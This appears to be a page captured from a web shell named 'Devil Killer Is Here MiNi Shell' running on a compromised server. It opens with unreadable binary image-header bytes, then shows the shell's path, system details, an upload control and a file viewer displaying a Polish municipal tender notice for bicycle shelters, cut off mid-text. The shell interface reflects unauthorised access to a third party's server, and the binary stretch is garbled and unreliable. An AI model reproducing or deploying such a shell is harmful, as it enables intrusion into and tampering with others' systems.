JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210817/0015148601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wiat rowerowych oraz stojaków rowerowych wraz z montażem, polegająca na realizacji projektów pn. „Zaparkuj swój rower” oraz „200 stojaków na rowery dla Bielan” – Budżet Obywatelski na rok 2021 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Stołeczne Warszawa - Dzielnica Bielany</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01525964000041</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">S. Żeromskiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-882</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48/224434822</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bielany.zamowienia@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bielany.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wiat rowerowych oraz stojaków rowerowych wraz z montażem, polegająca na realizacji projektów pn. „Zaparkuj swój rower” oraz „200 stojaków na rowery dla Bielan” – Budżet Obywatelski na rok 2021 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e2b5c062-ff3a-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00151486</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000113/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zaparkuj swój rower (BO 2021) 200 stojaków na rowery dla Bielan (BO) </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Przekazywanie ofert, wniosków o dopuszczenie do udziału w postępowaniu o udzielenie<br/>zamówienia.Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy.<br/>• Stałydostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na<br/>komputer;•komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>•Zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox,<br/>GoogleChrome lub MS Edge; • Zainstalowany program Acrobat Reader lub inny obsługujący pliki w<br/>formacie.pdf; Dopuszczalne wielkości i formaty przesyłanych danych.• Wielkość pojedynczego<br/>plikuzamieszczanego w systemie nieprzekraczająca 100 MB; • Dopuszczalne formaty plików: txt, rtf,<br/>pdf,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3,<br/>avi,mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng,<br/>xsl,xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc. Kodowanie i czas odbioru danych. • Plik<br/>załączonyi zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8.Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływieterminu składania ofert; • Oznaczenie czasu odbioru danych przez<br/>Platformę stanowi datę orazdokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>synchronizowanego odpowiednimźródłem czasu - zegarem Głównego Urzędu Miar. Wymagania<br/>sprzętowo-aplikacyjne w zakresiepodpisywania ofert. 1. W przypadku składania wniosku lub oferty w<br/>formie elektronicznej(podpisywania dokumentów kwalifikowanym podpisem elektronicznym),<br/>Wykonawca musi posiadać: •Kwalifikowany podpis elektroniczny osoby składającej wniosek lub ofertę<br/>w Systemie; • Włączona wprzeglądarce obsługa JavaScript;• Zainstalowane na komputerze<br/>środowisko uruchomienioweORACLE JAVA (dla systemu Windows - w wersji 32 oraz 64 bitowej – do<br/>pobrania ze stronyproducenta w sekcji Java SE Runtime Environment 8u202 - Windows x86 Offline<br/>oraz Windowsx64,dla systemu Mac - do pobrania ze strony producenta w sekcji Java SE Development<br/>Kit 8u202 - MacOS X x64; alternatywnie do oprogramowania ORACLE - JAVA w wersji OpenJDK)•<br/>Zainstalowanaaplikacja Szafir Host, • Podłączony lub wbudowany w komputer czytnik kart podpisu elektronicznego.Prawidłowość zainstalowania w/w komponentów można zweryfikować po zalogowaniu<br/>do OnePlace,po kliknięciu przycisku „SPRAWDŹ PODPIS”. 2. W przypadku składania wniosku lub<br/>oferty w postaci elektronicznej (podpisywania dokumentów podpisem osobistym), wykonawca musi<br/>posiadać (dotyczypostępowań o wartości mniejszej niż progi unijne): • E-dowód osobisty osoby<br/>składającej wniosek lubofertę w Systemie; • Włączona w przeglądarce opcja obsługi JavaScript;•<br/>Zainstalowane nakomputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows - w<br/>wersji 32 oraz 64bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windowsx86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SEDevelopment Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersjiOpenJDK)• Zainstalowana aplikacja Szafir Host; • Zainstalowane oprogramowanie do<br/>obsługi edowoduE-dowód menadżer dostępne na stronie https://www.gov.pl/web/e-dowod; •<br/>Podłączony lubwbudowany w komputer czytnik karty e-dowód. Prawidłowość zainstalowania w/w<br/>komponentówmożna zweryfikować po zalogowaniu do OnePlace, po kliknięciu przycisku „SPRAWDŹ<br/>PODPIS”. 3. Wprzypadku składania wniosku lub oferty w postaci elektronicznej (podpisywania<br/>dokumentów profilemzaufanym), wykonawca musi posiadać (dotyczy postępowań o wartości mniejszej<br/>niż progi unijne):•Profil zaufany osoby składającej wniosek lub ofertę w Systemie. Informacje<br/>dodatkowe. • Dokumenty wformacie „pdf" zaleca się podpisywać formatem PAdES. Z UWAGI NA<br/>OGRANICZENIA W LICZBIE ZNAKÓW POZOSTAŁĄ TREŚĆ ZAMIESZCZONO W SEKCJI IX.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA O PRZETWARZANIU<br/>DANYCH OSOBOWYCH<br/>(NA PODSTAWIE PRZEPISU PRAWA) Będziemy przetwarzać Pani/Pana dane osobowe, by<br/>mogła/mógł Pani/Pan załatwić sprawę w Urzędzie m.st. Warszawy. Mogą być przetwarzane w sposób<br/>zautomatyzowany, ale nie będą profilowane.<br/>Kto administruje moimi danymi?<br/>• Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie m.st. Warszawy jest<br/>Prezydent m.st. Warszawy, z siedzibą w Warszawie (00-950),<br/>Pl. Bankowy 3/5.<br/>• Na pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych, a także o przysługujące<br/>Pani/Panu prawa odpowie Inspektor Ochrony Danych w Urzędzie m.st. Warszawy. Proszę je wysłać<br/>na adres: iod@um.warszawa.pl.<br/>Dlaczego moje dane są przetwarzane?<br/>• Wynika to bezpośrednio z konkretnego przepisu prawa, tj. ustawy z dnia 11 września 2019 Prawo<br/>zamówień publicznych (Dz. U. z 2021 r., poz. 1129 j.t.) oraz aktów wykonawczych do niej<br/>wydanych; ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych, lub jest niezbędne do wykonania<br/>zadania w interesie publicznym albo w ramach sprawowania władzy publicznej.<br/>• Pani/Pana dane osobowe przetwarzane są w celu/celach: ubiegania się o udzielenie zamówienia<br/>publicznego.<br/>• Podanie przez Panią/Pana danych osobowych jest obowiązkowe. Jeśli Pani/Pan tego nie zrobi, nie<br/>będziemy mogli zrealizować Pana/Pani sprawy (Chyba że szczegółowe przepisy prawa stanowią<br/>inaczej).<br/>Jak długo będą przechowywane moje dane?<br/>• Pani/Pana dane osobowe będą przechowywane przez czas wymagany przepisami prawa, tj. czas<br/>prowadzonego postępowania o udzielenie zamówienia publicznego.<br/>Potem, zgodnie z przepisami, dokumenty trafią do archiwum zakładowego.<br/>Kto może mieć dostęp do moich danych?<br/>Odbiorcami Pani/Pana danych osobowych mogą być:<br/>a) podmioty, którym Administrator powierzy przetwarzanie danych osobowych w szczególności:<br/>• podmioty świadczące na rzecz Urzędu m.st. Warszawy usługi informatyczne, pocztowe;<br/>• podmiot Platforma Aukcyjna Marketplanet;<br/>b) organy publiczne i inne podmioty, którym Administrator udostępni dane osobowe na podstawie<br/>przepisów prawa;<br/>Jakie mam prawa w związku z przetwarzaniem moich danych?<br/>• Ma Pani/Pan prawo do:<br/>1. dostępu do danych osobowych, w tym uzyskania kopii tych danych;<br/>2. żądania sprostowania (poprawienia) danych osobowych;<br/>3. żądania usunięcia danych osobowych (tzw. prawo do bycia zapomnianym), w przypadku gdy:<br/>• dane nie są już niezbędne do celów, dla których były zebrane,<br/>lub w inny sposób przetwarzane;<br/>• nie ma podstawy prawnej do przetwarzania Pani/Pana danych osobowych;<br/>• wniosła Pani/Pan sprzeciw wobec przetwarzania i nie występują nadrzędne prawnie uzasadnione<br/>podstawy przetwarzania;<br/>• Pani/Pana dane przetwarzane są niezgodnie z prawem;<br/>• Pani/Pana dane muszą być usunięte, by wywiązać się z obowiązku wynikającego z przepisów prawa.<br/>4. żądania ograniczenia przetwarzania danych osobowych;<br/>5. sprzeciwu wobec przetwarzania danych – w przypadku, gdy łącznie spełnione są następujące<br/>przesłanki:<br/>• zaistnieją przyczyny związane z Pani/Pana szczególną sytuacją;<br/>• dane przetwarzane są w celu wykonania zadania realizowanego<br/>w interesie publicznym lub w ramach sprawowania władzy publicznej powierzonej Administratorowi, z<br/>wyjątkiem sytuacji, w której Administrator wykaże istnienie ważnych prawnie uzasadnionych podstaw<br/>do przetwarzanie danych osobowych, nadrzędnych wobec interesów, praw i wolności osoby, której<br/>dane dotyczą, lub podstaw do ustalenia, dochodzenia lub obrony roszczeń;<br/>6. Wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2, 00-193 Warszawa,<br/>infolinia telefoniczna: 606-950-000)<br/>w przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu<br/>w Urzędzie m.st. Warszawy Pani/Pana danych osobowych.<br/>• Nie przysługuje Pani/Panu prawo do przenoszenia danych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-III-WZP.271.30.2021.EPI</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 445103,80 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 258520,00 </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest:<br/>1)	Zakup, dostawa i montaż czterech wiat rowerowych (w tym trzech z przestawieniem stojaków rowerowych już istniejących oraz jednej z ustawieniem 10 sztuk U-kształtnych stojaków rowerowych nowych) oraz wykonanie pod wiatami nawierzchni z płyt betonowych otworowych oraz nawierzchni z płyt otworowych betonowych na dojściu do wiat. Na każdej wiacie zostanie zamieszczone oznaczenie, że projekt został zrealizowany w ramach Budżetu Obywatelskiego;<br/>2)	Zakup, dostawa i montaż stojaków rowerowych U-kształtnych w liczbie 200 (w tym 10 sztuk nowych pod wiatą rowerową zgodnie z pkt 1)) oraz jednego kompletu stojaków spiralnych na małe rowerki i hulajnogi, lokalizacja nowych stojaków rowerowych w załączonej tabeli;<br/>3)	Zakup, dostawa i montaż tablic informacyjnych przy stojakach z oznaczeniem, że projekt został zrealizowany w ramach Budżetu Obywatelskiego.<br/>2.	SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA określają:<br/>Projektowane postanowienia umowy – stanowiące załącznik nr 2 do SWZ wraz z załącznikami, w tym załącznikiem nr 1 do projektowanych postanowień umowy – określającym szczegółowo Opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44112100-9 - Wiaty</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39151100-6 - Stojaki</p> <p class="mb-0">45223800-4 - Montaż i wznoszenie gotowych konstrukcji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W celu wyboru najkorzystniejszej oferty Zamawiający przyjął następujące kryteria oceny ofert przypisując im odpowiednio wagi procentowe:<br/>1)	I kryterium: „Cena brutto” – waga 60%<br/>2)	II kryterium: „Wydłużenie okresu gwarancji na dostawę i montaż wiat rowerowych” – waga 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji na dostawę i montaż wiat rowerowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od otrzymania wezwania, aktualnych na dzień złożenia,<br/>podmiotowych środków dowodowych, o których mowa poniżej.<br/>1.1.W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu o udzielenie<br/>zamówienia Wykonawca składa:<br/>a) oświadczenie Wykonawcy (sporządzone wg wzoru określonego w załączniku nr 3 do SWZ) – o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 ustawy, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych w pkt. 12.1 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (UWAGA! Wspólnicy spółki cywilnej w rozumieniu ustawy PZP to Wykonawcy wspólnie ubiegający się o udzielenie zamówienia). W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2. Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>• postępowania o zamówienie publiczne, którego dotyczy;<br/>• wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z<br/>nazwy z określeniem adresu siedziby;<br/>• ustanowionego Pełnomocnika oraz zakresu jego umocowania.<br/>3. Dokument pełnomocnictwa musi być podpisany przez Wykonawców wspólnie ubiegających<br/>się wspólnie o udzielenie zamówienia, przy czym nie jest wymagany podpis pełnomocnika.<br/>Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione<br/>we właściwym rejestrze lub ewidencji Wykonawców.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich<br/>nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, oraz w przypadkach, o<br/>których mowa w pkt 12.1.2. SWZ.<br/>5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o<br/>którym mowa w pkt. 18.2.2. SWZ składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia.<br/>6. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani<br/>na wezwanie Zamawiającego złożyć (każdy z nich) aktualne na dzień złożenia podmiotowe<br/>środki dowodowe, o których mowa w pkt 18.2.3.1. SWZ.<br/>7. Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia, został określony w<br/>projektowanych postanowieniach umowy, w § 17: <br/>1. Zmiany i uzupełnienia treści niniejszej umowy wymagają pod rygorem nieważności formy pisemnej, w postaci aneksu. <br/>2. Na podstawie art. 455 